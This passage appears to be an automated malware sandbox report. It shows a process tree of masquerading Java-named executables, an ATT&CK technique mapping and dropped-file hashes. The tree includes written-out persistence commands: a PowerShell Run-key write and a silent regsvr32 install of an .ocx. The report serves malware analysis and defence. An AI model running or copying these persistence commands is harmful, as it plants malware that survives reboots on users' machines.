        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        8⤵
        
        PID:25524
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        9⤵
        
        PID:25872
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        10⤵
        
        PID:26200
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        11⤵
        
        PID:25876
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        12⤵
        
        PID:25556
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        13⤵
        
        PID:26248
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        14⤵
        
        PID:25924
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        15⤵
        
        PID:25728
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        16⤵
        
        PID:7076
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice_service.exe"
        17⤵
        Modifies registry key
        
        PID:26964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservice_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe\"'"
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:17908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:26588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:26596

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:26148

C:\Windows\system32\regsvr32.EXE
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"
1⤵
PID:26948
- C:\Windows\SysWOW64\regsvr32.exe
  /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"
  2⤵
  PID:23840

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:17824

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:17744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe"
1⤵
PID:16972
- C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
  2⤵
  PID:11952
- - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
    3⤵
    PID:23268
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
      4⤵
      PID:21068
    - - C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        5⤵
        
        PID:21008
      - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        6⤵
        
        PID:23764
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        7⤵
        
        PID:24088
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        8⤵
        
        PID:19008
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        9⤵
        
        PID:23956
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        10⤵
        
        PID:20992
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        11⤵
        
        PID:19312
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        12⤵
        
        PID:24060
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        13⤵
        
        PID:23668
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        14⤵
        
        PID:23876
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        15⤵
        
        PID:22460
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        16⤵
        
        PID:19392
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        17⤵
        
        PID:22660
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        18⤵
        
        PID:4936
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        19⤵
        
        PID:24040
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        20⤵
        
        PID:20108
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        21⤵
        
        PID:19668
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        22⤵
        
        PID:19356
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        23⤵
        
        PID:19544
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        24⤵
        
        PID:20352
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        25⤵
        
        PID:20372
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        26⤵
        
        PID:26292
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        27⤵
        
        PID:24296
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        28⤵
        
        PID:24228
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        29⤵
        
        PID:18872
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        30⤵
        
        PID:20376
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaruntime_update.exe"
        31⤵
        Modifies registry key
        
        PID:5852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaruntime_update.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe\"'"
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:26540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 17156 -ip 17156
1⤵
PID:11716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 10320 -ip 10320
1⤵
PID:10276

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:24164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 10376 -ip 10376
1⤵
PID:18352

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\GHCGDAFCFHIDBGDHCFCB

Filesize
56KB

MD5
1c832d859b03f2e59817374006fe1189

SHA1
a4994a54e9f46a6c86ff92280c6dabe2bcd4cc42

SHA256
bb923abf471bb79086ff9ace293602e1ad882d9af7946dda17ff1c3a7e19f45b

SHA512
c4d3be414fa5dd30151cde9f6d808d56c26b031ff3f6446d21a15d071053787b6ba337b12909a56af7bb420f858dba5213f08e64ca9f836f52c98a18762b4bef

Download Submit
C:\ProgramData\HJJJECFIECBGDGCAAAEHIEGDGC

Filesize
96KB

MD5
6066c07e98c96795ecd876aa92fe10f8

SHA1
f73cbd7b307c53aaae38677d6513b1baa729ac9f

SHA256
33a2357af8dc03cc22d2b7ce5c90abf25ac8b40223155a516f1a8df4acbf2a53

SHA512
7d76207c1c6334aa98f79c325118adf03a5ba36b1e2412803fd3e654a9d3630c775f32a98855c46342eba00d4a8496a3ded3686e74beaac9c216beee37aa5cb7

Download Submit
C:\ProgramData\KJEHJKJEBGHJJKEBGIEC

Filesize
40KB

MD5
dfd4f60adc85fc874327517efed62ff7

SHA1
f97489afb75bfd5ee52892f37383fbc85aa14a69

SHA256
c007da2e5fd780008f28336940b427c3bfd509c72a40bfb7759592149ff3606e

SHA512
d76f75b1b5b23aa4f87c53ce44c3d3b7e41a44401e53d89f05a114600ea3dcd8beda9ca1977b489ac6ea5586cf26e47396e92d4796c370e89fab0aa76f38f3c4

Download Submit
C:\ProgramData\gvs00\l6xtrq

Filesize
130KB

MD5
e3f3905cf5c5bccb83526d0ede5afc1f

SHA1
4966d68bdc55a5b7d9c2815a26a3b65ee8e5523d

SHA256
24b4eb9142b500826ac950a371e646848ea0d4a4d4e7f7f63d0b8cbdc73868b3

SHA512
5807618759d0362bc97b6917b71ed5312d67e5af6611a6be222c41466bc4536e313103a9571c286751d1b43080fcc5bfdfe5570ef7190994d570dfffdedd926a

Download Submit
C:\ProgramData\h4wb1dbiek.exe

Filesize
251KB

MD5
58d3a0d574e37dc90b40603f0658abd2

SHA1
bf5419ce7000113002b8112ace2a9ac35d0dc557

SHA256
dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5

SHA512
df61329a32e9261b01c5b7d95e0d9a3fb8cc36e5d90ede72bc16befe00fb32c221898a8346db9de07c0f5dcba57dcdbb09a22ca8b73223f989d33ec433c3a90a

Download Submit
C:\ProgramData\knyukx4ect.exe

Filesize
850KB

MD5
260faa08dbff4bc7ca6346061f42b956

SHA1
ccef508bb2693b097510015ef89ebb8f0289c5c1

SHA256
c47a55b842177445756163ca2d5cadaed5cdd4d313d7897b9aaac8e1d1c6e810

SHA512
ae30c903720f58abef12b9e091872d4a6470bae5ba246fc1d35dbaa4aecad04803647a0339490090a037de780b09df4282d5cc6247731729bf24e8fe872c42dc

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\ProgramData\wb1n79r9hd.exe

Filesize
736KB

MD5
18e5e760b807fc2b05172215540398b3

SHA1
6a1b4d3227088473c45869469b68a1737b26b90d

SHA256
6cff9733bcd32c2af2da61eab8281cd412a6d208ce6b763b783157be2901d5bd

SHA512
23430597753696466eea1c54337b1d37a734918433be2e0637aaf022c0ef09d5f8b04a3793ccb1a296bb83d13fda832d677cb926730653d78b0833f96737fa04

Download Submit
C:\Temp\ESZPJoGnb.hta

Filesize
779B

MD5
39c8cd50176057af3728802964f92d49

SHA1
68fc10a10997d7ad00142fc0de393fe3500c8017

SHA256
f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

SHA512
cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

Download Submit
C:\Users\Admin:.repos

Filesize
1.2MB

MD5
0a330808eead1fa7f3754521fd08aac3

SHA1
38597b0b9fcad5437f02773fbcdd99203a85fae1

SHA256
ea2773c5651e86579da211453de10e2ff7f723d70bd3246d4a0684a7d22a4661

SHA512
34167bf8bff71a067fd7dff77e0a9e1c485076b9308bb6f5abd34eefcf9de8ea88bdd01d2876c7994dc991999b09d2385fccd6d031f1eeab55d603d31b07c3aa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
5eeb51e9e64e555e4a7d2705eb9976db

SHA1
742d0f4d9a77575115f5c5ad9ac8a133bd7abde6

SHA256
47b9983eedcea6a3828388e3097617595b69ff60543180b2411b20b0444085aa

SHA512
32c4630f6be0210efa8330dd1286855379c169c048543d4bc1a985eba6fdedb67b3c8fab522265f667276f74fbd4290013588d8233003bfbce63701fb8ae3581

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
17bfee988d2f335bc5659c484949461e

SHA1
2a70f34d53264fcd3b84a86ccec55f53c5bfc13c

SHA256
c535a2a03c7cdd06fb4ecb95bc3c7da0185430a307e5c5bde6d7685538a3975a

SHA512
195da7bcfd0ce64d3b8a0bc74371f463e814478e447e1f0f811fb47f0be80ff67ca04e371c1d3c694788ed8a6966b09feb0487ecce75448d5447a968b593d2e6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
79KB

MD5
c4e3debc5e87b14ef17ac22c55fe110a

SHA1
91b53378158c3dd342eb408cb7b81bb353dad5e2

SHA256
3360aba0239e92a6d440882822e863712aaff8a029c140d37c53a26dda0204f0

SHA512
ed403b19ecb095d68bbbd310a456edde719d437bfed98d949d86c8551e9b1024907dea648306f31f2d4b80cf5c8f1427d0052fc4d9aa45c4e574b4c8fd88cf19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
25604a2821749d30ca35877a7669dff9

SHA1
49c624275363c7b6768452db6868f8100aa967be

SHA256
7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

SHA512
206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
89ef50c45b72aa08e917be3e18bc3b78

SHA1
b42e77bf104aeb85dc7a9eda39cda50154a706aa

SHA256
310842091c275f2683e22680dedb5cde6cf7d1f1a0aa677048d2f6ac9d178cc3

SHA512
1f20f549383bfdd741eb68057c7a3c8c9aa239f1d72e2d4c4d0a319fd4237ea0dfb83fd58104a28545e830433a1069a27239ef2014f991fef6295848f40f9acc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
886fde6fb1f645100f44965f90c9f4f5

SHA1
4b97927354aafa06879f19aa8a0f828aabfcab96

SHA256
17e8b6c7f9bc7a0759b27fcdb634872ee4c6ac01a4a9856b4d0a778c05e215fa

SHA512
f1383cc1e8f9208a75f8a91d0d8a0a08258d89e068249326dd83a3d2f576d352f137e22c9d91ffaab5186068dcb2b51d4a53e3c0eb0c5c375faa4c4e0866d706

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
2de6aa3e9ae78cbf4e4853012d1840b5

SHA1
eb0338a3c9e487a31692c46319bc1a42d258079e

SHA256
33c3737357c3760433bfeb09b843d782b89fad496c75b3daa07668404fd07527

SHA512
57d0e899db5273213aa6c4fef801b8e291ff5d6dda90a70061213c0b0378dde2695cf157eefdf11547a3a4ec4cc410ff893748a64ce09705c8edf21f9e70fe2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
8625e8ce164e1039c0d19156210674ce

SHA1
9eb5ae97638791b0310807d725ac8815202737d2

SHA256
2f65f9c3c54fe018e0b1f46e3c593d100a87758346d3b00a72cb93042daf60a2

SHA512
3c52b8876982fe41d816f9dfb05cd888c551cf7efd266a448050c87c3fc52cc2172f53c83869b87d7643ce0188004c978570f35b0fcc1cb50c9fffea3dec76a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\55d9a676-a08c-4493-9aeb-e9df283beaa8.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000c4

Filesize
162KB

MD5
3b63b10783c093c8c67491b7ce4adc61

SHA1
b94a7fc33f8b03079cac19583255e5a80e9ae9d9

SHA256
fe3c30eb279d61588b1ad5a8b5cd01ce8e3c5fbb2b62d22d4b50d143fa31835a

SHA512
14e53c7bd5ba13a088ff47018375320e23cd343c9e075e73b14a51de56832dbbb3244e9e656620d9ea0e59c15737c95893060ab8c2d633da1a719ba8bc581517

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\000003.log

Filesize
49KB

MD5
13bdd00c6f2b2e098cd19d1b6d752041

SHA1
b3846c28a4b35dde1ecfd80f27985bd66eee3235

SHA256
f64e3f071f4b46c0e47166efc09bc3adc67cafeae7d4ebb1067f8680f630cf19

SHA512
0c8a51bb9a9583ad6b7762a624d0bb8a88786b3f5ad5d06e8e69eab9ac6c617441857ea88467926183f6684257a59e08cc2f99e21ed12deaea479c759d666841

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

Filesize
327B

MD5
c2bfc6f6b23391e75b12afa794deceb9

SHA1
466c2ec16a14abbad5f08151342edca802156980

SHA256
d6749ddf138f5a43eee4afa65703617895174b6797be68951ee220f1afd3e25b

SHA512
7d2c3e8885fc71fc4f6ba80e34f7cbdc2515a7fe5681517d9f1d39d00e108154d5b599fb7459f34e21de0d6fdb56aa05027099aace054139c69eda647ff939bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
b1f595dae75e5e00f6c66d725c8d646c

SHA1
5457ebaf2de26ce3d96442ab13082a628285f903

SHA256
11d36545847a10dc6052e8667f686c4ebc461b7b39f4f890d31fd91243b180e2

SHA512
24d568028ba6c22192df020c2f19808d0ce3f20cab0db240c939299ce3644a323fc38a9ce40585e0b5cd38493b740bb6c811a894a7b90e6135d3da6efc0e9dab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\A0YW8B0D\dll[1]

Filesize
236KB

MD5
2ecb51ab00c5f340380ecf849291dbcf

SHA1
1a4dffbce2a4ce65495ed79eab42a4da3b660931

SHA256
f1b3e0f2750a9103e46a6a4a34f1cf9d17779725f98042cc2475ec66484801cf

SHA512
e241a48eafcaf99187035f0870d24d74ae97fe84aaadd2591cceea9f64b8223d77cfb17a038a58eadd3b822c5201a6f7494f26eea6f77d95f77f6c668d088e6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\A0YW8B0D\success[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\AH2PF5WH\soft[1]

Filesize
3.0MB

MD5
2cb4cdd698f1cbc9268d2c6bcd592077

SHA1
86e68f04bc99f21c9d6e32930c3709b371946165

SHA256
c89a0fea7c3850c8bf4b6a231a34cfb699c97783b1b2b1176070dd4d9cb4bd4a

SHA512
606216ce50d2c89f4700fd3f8853b09f5626615cac64bfe304c15524a908b4a220abed1a023b0f099d390a2e5b14e1dc4f94840aa398658188ad299c93939de3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
0c98e4b73b9068a19fa88e820e65c1da

SHA1
92ef24a9f6eefdeec6091c31fb88f9af3bcf6f5b

SHA256
0281f5f4910186c81d64308fc8dcceb768edd60986d93e6bea500dffbef4a053

SHA512
f9986c916754e4e11947754b684e3f8f4b7a1ae6a8897d66600e3153ca2d384c35262d305adfe78f49aa5ec94ff2ba23fc51b9b16a81f748ff777668cf397dd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
e49d623c6ac7dee44326f4b02691f5b5

SHA1
9c4dbdbd849691d968f1dffcbc4f26b536696ff0

SHA256
f326d41b06d5f6a10cca9174d620d9ef160f9ad2bbab3912c52466fc645ac613

SHA512
f0af75a7c480ea15d7e6b22fc1448b0ff7472d1af7ec23b984c80cfd227cd30b5b96bb82d25a96f0c83b2344e0e637b97f1c0d8bfcc835d71fe217ea7025e451

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
55e3c337d8833648d2c813685a900ce1

SHA1
03c4ea3f0c8a06cc94c0c937f476cea7c0243acd

SHA256
4fecb1af633cc55a499f41dbc5d778262135b2add271c74589908c1ed7f5cb78

SHA512
cf4709065656684bae6ea4f7ba864c0cff8705e9a7f948f2bc7ccdce8365ad09c90cae0fe6af14c3634447c57c68cec6418dae1f890440c9d4f27e95d58109a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
98c2bb3205c7bc577436da201401a667

SHA1
e8251dfdff534a9a863820f76c1be99d3656f5fa

SHA256
3b5f131c974db43a946262b567d29fb8d0ed76c062067ae67cbc8d47f6429664

SHA512
14be5e2f8b5dacab624cd9b3ad041e7a891c7d5aa9ad9a89d0f2df63b084ca2e82800a30b2bd7e5a48d3d7c0a72702f9987c1e0f94609d7e5436b01996a6fccf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
c374cefceeaef040e30d1150c9f92162

SHA1
ae1e551ecd7e40da315d060d77d21a4de7034f09

SHA256
33b046c6eabfe1ec80c16c5e96cdaaf2636f3ee02f97fbeab96cdb6145c28fe3

SHA512
84281d47ea7317b0fcc298c4a11610fe22a85a25704b89eab5c5a71a6e1bc7e9a5405034c79258ce79c0036d5774ea5e3b2281c2f0fc64e9c02b21c3b88a6bfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
e8deca379f37d327017cce2d8f0ee459

SHA1
cb65a0e47cf6b36c26206e75d985447c4bc4a7ef

SHA256
a8b6b100484b127a09e8f667a9ed33241c98cdeffcfeed31bf7fce7c887cc088

SHA512
